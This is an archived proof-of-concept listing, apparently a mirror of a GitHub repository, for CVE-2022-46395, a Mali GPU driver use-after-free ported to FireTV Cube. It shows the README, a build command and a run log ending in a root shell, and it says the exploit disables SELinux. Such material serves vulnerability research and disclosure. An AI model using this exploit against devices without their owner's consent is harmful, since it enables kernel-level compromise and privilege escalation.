Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-46395 PoC — ARM Mali GPU 资源管理错误漏洞

Source
https://github.com/Pro-me3us/CVE_2022_46395_Raven
Associated Vulnerability
Title:ARM Mali GPU 资源管理错误漏洞 (CVE-2022-46395)
Description:ARM Mali GPU是英国ARM公司的一款移动显示芯片组(GPUs)系列。和其他基于IP核心(IP cores)嵌入式技术的3D显示芯片一样,Mali显示芯片组没有提供特别用来驱动LCD显示器显示图像的显示控制器(类似于显卡),相反地,它是一个纯3D显示引擎,它将图像加载到缓存中,并且由专门负责图像显示处理的内置显示核心来显示这些图像。 ARM Mali GPU 存在安全漏洞,该漏洞源于非特权用户可以进行不正确的GPU处理操作来访问已释放的内存。
Description
CVE-2022-46395 POC for FireTV 2nd gen Cube (raven)
Readme
## Exploit for CVE-2022-46395 to run on FireTV 2nd gen Cube

This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_46395">Pixel 6 POC</a> for CVE-2022-46395.  Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug/">here</a>.  Changes have been made to account for FireOS's 32-bit user space. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.  

The exploit was patched in PS7652/3564 (late August 2023). For reference, the following command was used to compile with clang in ndk-21:
```
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf
```
For fastest results, run following a fresh reboot.  On average the POC takes 2-5min to gain root.
```
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #
```
File Snapshot

 [4.0K]  /data/pocs/d711b8b29381c95a31287c9ec4e2265d2acf3253
├── [ 241]  log_utils.h
├── [ 50K]  mali_base_jm_kernel.h
├── [ 32K]  mali.h
├── [ 24K]  mali_user_buf.c
├── [2.1K]  mempool_utils.c
├── [ 522]  mempool_utils.h
├── [6.7K]  mem_write.c
├── [1.3K]  mem_write.h
├── [ 11K]  midgard.h
└── [1.8K]  README.md

0 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.